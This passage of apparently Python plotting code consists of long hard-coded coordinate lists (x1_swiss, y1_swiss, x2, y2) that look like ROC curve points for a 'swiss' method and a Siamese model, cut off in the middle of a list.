0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9915966386554622, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 
0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 0.9957983193277311, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1] x1_swiss, y1_swiss = [0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.003194888178913738, 0.012779552715654952, 0.012779552715654952, 0.012779552715654952, 0.012779552715654952, 0.012779552715654952, 0.012779552715654952, 0.012779552715654952, 0.012779552715654952, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.01597444089456869, 0.019169329073482427, 0.019169329073482427, 0.019169329073482427, 0.022364217252396165, 0.022364217252396165, 0.022364217252396165, 0.022364217252396165, 0.022364217252396165, 0.02875399361022364, 0.03194888178913738, 0.03194888178913738, 0.03194888178913738, 0.038338658146964855, 0.038338658146964855, 0.04153354632587859, 0.04792332268370607, 0.04792332268370607, 0.04792332268370607, 0.04792332268370607, 0.04792332268370607, 0.051118210862619806, 0.051118210862619806, 0.051118210862619806, 0.051118210862619806, 0.054313099041533544, 0.054313099041533544, 0.06389776357827476, 0.06389776357827476, 0.06389776357827476, 0.06389776357827476, 0.06389776357827476, 0.06389776357827476, 0.07028753993610223, 0.07028753993610223, 0.07348242811501597, 0.07348242811501597, 0.07667731629392971, 0.07987220447284345, 0.08306709265175719, 0.08306709265175719, 0.08306709265175719, 0.08306709265175719, 0.08306709265175719, 0.08945686900958466, 0.0926517571884984, 0.10223642172523961, 0.10223642172523961, 0.10223642172523961, 0.10862619808306709, 0.11182108626198083, 0.1182108626198083, 0.12140575079872204, 0.12140575079872204, 0.12140575079872204, 0.12140575079872204, 0.12460063897763578, 0.12460063897763578, 0.12779552715654952, 0.13738019169329074, 0.13738019169329074, 0.14376996805111822, 0.15654952076677317, 0.16613418530351437, 0.16613418530351437, 0.1757188498402556, 0.17891373801916932, 0.18210862619808307, 0.19169329073482427, 0.19169329073482427, 0.19808306709265175, 
0.19808306709265175, 0.2012779552715655, 0.20766773162939298, 0.2108626198083067, 0.2108626198083067, 0.2108626198083067, 0.22044728434504793, 0.2268370607028754, 0.2364217252396166, 0.2364217252396166, 0.24281150159744408, 0.24600638977635783, 0.24600638977635783, 0.24600638977635783, 0.24600638977635783, 0.25559105431309903, 0.2715654952076677, 0.2779552715654952, 0.28434504792332266, 0.29073482428115016, 0.2939297124600639, 0.3003194888178914, 0.30670926517571884, 0.3226837060702875, 0.33226837060702874, 0.3450479233226837, 0.34824281150159747, 0.3514376996805112, 0.36421725239616615, 0.3706070287539936, 0.3706070287539936, 0.3738019169329074, 0.38338658146964855, 0.38977635782747605, 0.41214057507987223, 0.4217252396166134, 0.4281150159744409, 0.43450479233226835, 0.4440894568690096, 0.4440894568690096, 0.4504792332268371, 0.46325878594249204, 0.476038338658147, 0.48562300319488816, 0.48562300319488816, 0.49201277955271566, 0.49201277955271566, 0.4952076677316294, 0.5015974440894568, 0.5047923322683706, 0.5111821086261981, 0.5143769968051118, 0.5175718849840255, 0.5207667731629393, 0.5271565495207667, 0.5271565495207667, 0.5271565495207667, 0.5303514376996805, 0.5303514376996805, 0.5335463258785943, 0.5335463258785943, 0.536741214057508, 0.5431309904153354, 0.549520766773163, 0.5527156549520766, 0.5654952076677316, 0.5686900958466453, 0.5718849840255591, 0.5782747603833865, 0.5942492012779552, 0.6006389776357828, 0.6038338658146964, 0.6070287539936102, 0.6134185303514377, 0.6166134185303515, 0.6198083067092651, 0.6261980830670927, 0.6325878594249201, 0.6357827476038339, 0.6421725239616614, 0.645367412140575, 0.65814696485623, 0.6645367412140575, 0.670926517571885, 0.6741214057507987, 0.6837060702875399, 0.6869009584664537, 0.6932907348242812, 0.6964856230031949, 0.6996805111821086, 0.6996805111821086, 0.6996805111821086, 0.7028753993610224, 0.7092651757188498, 0.7156549520766773, 0.7156549520766773, 0.7220447284345048, 0.7252396166134185, 0.7348242811501597, 
0.7348242811501597, 0.7348242811501597, 0.744408945686901, 0.7507987220447284, 0.7507987220447284, 0.7571884984025559, 0.7603833865814696, 0.7603833865814696, 0.7603833865814696, 0.7635782747603834, 0.7635782747603834, 0.7667731629392971, 0.7667731629392971, 0.7763578274760383, 0.7763578274760383, 0.7827476038338658, 0.7859424920127795, 0.7859424920127795, 0.792332268370607, 0.7955271565495208, 0.805111821086262, 0.8083067092651757, 0.8178913738019169, 0.8210862619808307, 0.8210862619808307, 0.8274760383386581, 0.8306709265175719, 0.8338658146964856, 0.8370607028753994, 0.8402555910543131, 0.8402555910543131, 0.8434504792332268, 0.8466453674121406, 0.8562300319488818, 0.8562300319488818, 0.8594249201277955, 0.8626198083067093, 0.8626198083067093, 0.865814696485623, 0.8690095846645367, 0.8722044728434505, 0.8753993610223643, 0.8753993610223643, 0.8753993610223643, 0.8753993610223643, 0.8785942492012779, 0.8785942492012779, 0.8785942492012779, 0.8785942492012779, 0.8785942492012779, 0.8785942492012779, 0.8849840255591054, 0.8849840255591054, 0.8849840255591054, 0.8881789137380192, 0.8881789137380192, 0.8945686900958466, 0.8977635782747604, 0.9009584664536742, 0.9041533546325878, 0.9041533546325878, 0.9041533546325878, 0.9073482428115016, 0.9073482428115016, 0.9105431309904153, 0.9105431309904153, 0.9137380191693291, 0.9137380191693291, 0.9137380191693291, 0.9137380191693291, 0.9169329073482428, 0.9169329073482428, 0.9201277955271565, 0.9201277955271565, 0.9233226837060703, 0.9233226837060703, 0.9233226837060703, 0.9233226837060703, 0.9233226837060703, 0.9233226837060703, 0.9233226837060703, 0.9297124600638977, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9361022364217252, 0.9361022364217252, 0.939297124600639, 0.939297124600639, 0.939297124600639, 0.9456869009584664, 0.9488817891373802, 0.9488817891373802, 0.9488817891373802, 0.952076677316294, 0.952076677316294, 0.952076677316294, 
0.9552715654952076, 0.9552715654952076, 0.9552715654952076, 0.9552715654952076, 0.9584664536741214, 0.9648562300319489, 0.9648562300319489, 0.9712460063897763, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9776357827476039, 0.9808306709265175, 0.9808306709265175, 0.9840255591054313, 0.9840255591054313, 0.9840255591054313, 0.9840255591054313, 0.9904153354632588, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 1] , [0, 0.0, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.003194888178913738, 0.006389776357827476, 0.006389776357827476, 0.006389776357827476, 0.006389776357827476, 0.006389776357827476, 0.009584664536741214, 0.009584664536741214, 0.012779552715654952, 0.019169329073482427, 0.022364217252396165, 0.02875399361022364, 0.02875399361022364, 0.02875399361022364, 0.02875399361022364, 0.03194888178913738, 0.03194888178913738, 0.03194888178913738, 0.03514376996805112, 0.038338658146964855, 0.04153354632587859, 0.04153354632587859, 0.04792332268370607, 0.051118210862619806, 0.054313099041533544, 0.05750798722044728, 0.06389776357827476, 0.07348242811501597, 
0.07667731629392971, 0.08626198083067092, 0.0926517571884984, 0.09904153354632587, 0.10862619808306709, 0.10862619808306709, 0.11182108626198083, 0.1182108626198083, 0.12460063897763578, 0.12779552715654952, 0.14057507987220447, 0.14376996805111822, 0.14696485623003194, 0.16293929712460065, 0.16613418530351437, 0.16932907348242812, 0.1757188498402556, 0.17891373801916932, 0.1853035143769968, 0.19488817891373802, 0.19808306709265175, 0.20766773162939298, 0.22044728434504793, 0.2268370607028754, 0.23003194888178913, 0.2364217252396166, 0.24600638977635783, 0.24920127795527156, 0.25559105431309903, 0.26198083067092653, 0.26198083067092653, 0.26517571884984026, 0.268370607028754, 0.2715654952076677, 0.2715654952076677, 0.2747603833865815, 0.2779552715654952, 0.28115015974440893, 0.28434504792332266, 0.2939297124600639, 0.2971246006389776, 0.3003194888178914, 0.3035143769968051, 0.30670926517571884, 0.30990415335463256, 0.30990415335463256, 0.31629392971246006, 0.329073482428115, 0.3354632587859425, 0.33865814696485624, 0.33865814696485624, 0.34185303514376997, 0.3450479233226837, 0.3514376996805112, 0.3610223642172524, 0.3706070287539936, 0.3738019169329074, 0.3769968051118211, 0.3801916932907348, 0.3801916932907348, 0.38338658146964855, 0.38977635782747605, 0.3929712460063898, 0.3961661341853035, 0.3993610223642173, 0.3993610223642173, 0.4057507987220447, 0.41214057507987223, 0.41533546325878595, 0.4217252396166134, 0.43130990415335463, 0.43130990415335463, 0.43130990415335463, 0.43769968051118213, 0.44089456869009586, 0.4440894568690096, 0.4472843450479233, 0.4472843450479233, 0.4504792332268371, 0.45686900958466453, 0.46645367412140576, 0.46645367412140576, 0.476038338658147, 0.476038338658147, 0.48242811501597443, 0.48562300319488816, 0.48881789137380194, 0.48881789137380194, 0.4984025559105431, 0.5047923322683706, 0.5079872204472844, 0.5111821086261981, 0.5111821086261981, 0.5111821086261981, 0.5175718849840255, 0.5175718849840255, 0.5271565495207667, 
0.5335463258785943, 0.5399361022364217, 0.5431309904153354, 0.5431309904153354, 0.5431309904153354, 0.5463258785942492, 0.5463258785942492, 0.5527156549520766, 0.5559105431309904, 0.5591054313099042, 0.5591054313099042, 0.5623003194888179, 0.5654952076677316, 0.5654952076677316, 0.5718849840255591, 0.5718849840255591, 0.5750798722044729, 0.5750798722044729, 0.5782747603833865, 0.5814696485623003, 0.5814696485623003, 0.5878594249201278, 0.5878594249201278, 0.5910543130990416, 0.5942492012779552, 0.5942492012779552, 0.6070287539936102, 0.610223642172524, 0.6134185303514377, 0.6230031948881789, 0.6261980830670927, 0.6261980830670927, 0.6261980830670927, 0.6389776357827476, 0.6389776357827476, 0.6389776357827476, 0.645367412140575, 0.6485623003194888, 0.6613418530351438, 0.6613418530351438, 0.6645367412140575, 0.6645367412140575, 0.6677316293929713, 0.6741214057507987, 0.6741214057507987, 0.6773162939297125, 0.6773162939297125, 0.6805111821086262, 0.6805111821086262, 0.6837060702875399, 0.6869009584664537, 0.6869009584664537, 0.6869009584664537, 0.6900958466453674, 0.6932907348242812, 0.6996805111821086, 0.7028753993610224, 0.7028753993610224, 0.7060702875399361, 0.7092651757188498, 0.7156549520766773, 0.7156549520766773, 0.7156549520766773, 0.7188498402555911, 0.7284345047923323, 0.7284345047923323, 0.731629392971246, 0.731629392971246, 0.731629392971246, 0.7348242811501597, 0.7380191693290735, 0.7380191693290735, 0.7380191693290735, 0.7412140575079872, 0.744408945686901, 0.744408945686901, 0.7507987220447284, 0.7571884984025559, 0.7603833865814696, 0.7603833865814696, 0.7635782747603834, 0.7699680511182109, 0.7731629392971247, 0.7731629392971247, 0.7731629392971247, 0.7795527156549521, 0.7795527156549521, 0.7795527156549521, 0.7859424920127795, 0.7859424920127795, 0.7859424920127795, 0.7859424920127795, 0.7955271565495208, 0.7955271565495208, 0.7955271565495208, 0.7987220447284346, 0.8019169329073482, 0.8019169329073482, 0.8019169329073482, 0.8019169329073482, 
0.8083067092651757, 0.8115015974440895, 0.8115015974440895, 0.8115015974440895, 0.8115015974440895, 0.8178913738019169, 0.8210862619808307, 0.8274760383386581, 0.8306709265175719, 0.8306709265175719, 0.8306709265175719, 0.8338658146964856, 0.8370607028753994, 0.8402555910543131, 0.8434504792332268, 0.8434504792332268, 0.8466453674121406, 0.8466453674121406, 0.8466453674121406, 0.853035143769968, 0.853035143769968, 0.8562300319488818, 0.8562300319488818, 0.8594249201277955, 0.8626198083067093, 0.8690095846645367, 0.8753993610223643, 0.8753993610223643, 0.8753993610223643, 0.8785942492012779, 0.8817891373801917, 0.8817891373801917, 0.8913738019169329, 0.8945686900958466, 0.8945686900958466, 0.8945686900958466, 0.8945686900958466, 0.8945686900958466, 0.8945686900958466, 0.9009584664536742, 0.9041533546325878, 0.9041533546325878, 0.9041533546325878, 0.9041533546325878, 0.9041533546325878, 0.9041533546325878, 0.9073482428115016, 0.9073482428115016, 0.9105431309904153, 0.9137380191693291, 0.9137380191693291, 0.9137380191693291, 0.9137380191693291, 0.9169329073482428, 0.9201277955271565, 0.9201277955271565, 0.9233226837060703, 0.9265175718849841, 0.9265175718849841, 0.9265175718849841, 0.9265175718849841, 0.9265175718849841, 0.9265175718849841, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9329073482428115, 0.9361022364217252, 0.9424920127795527, 0.9456869009584664, 0.9456869009584664, 0.9456869009584664, 0.952076677316294, 0.952076677316294, 0.9552715654952076, 0.9552715654952076, 0.9584664536741214, 0.9584664536741214, 0.9584664536741214, 0.9584664536741214, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9616613418530351, 0.9680511182108626, 0.9680511182108626, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 
0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9744408945686901, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9776357827476039, 0.9808306709265175, 0.9840255591054313, 0.987220447284345, 0.987220447284345, 0.987220447284345, 0.9904153354632588, 0.9904153354632588, 0.9904153354632588, 0.9904153354632588, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9936102236421726, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 0.9968051118210862, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1.0, 1] # Siamese from x2, y2 = [0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 
0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 
0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.020833333333333332, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.041666666666666664, 0.0625, 0.0625, 0.0625, 0.0625, 0.0625, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 
0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.08333333333333333, 0.10416666666666667, 0.10416666666666667, 0.10416666666666667, 0.10416666666666667, 0.10416666666666667, 0.10416666666666667, 0.10416666666666667, 0.10416666666666667, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.14583333333333334, 0.20833333333333334, 0.20833333333333334, 0.20833333333333334, 0.20833333333333334, 0.20833333333333334, 0.20833333333333334, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 
0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.22916666666666666, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.25, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2708333333333333, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.2916666666666667, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3333333333333333, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.3541666666666667, 0.375, 0.3958333333333333, 0.3958333333333333, 0.3958333333333333, 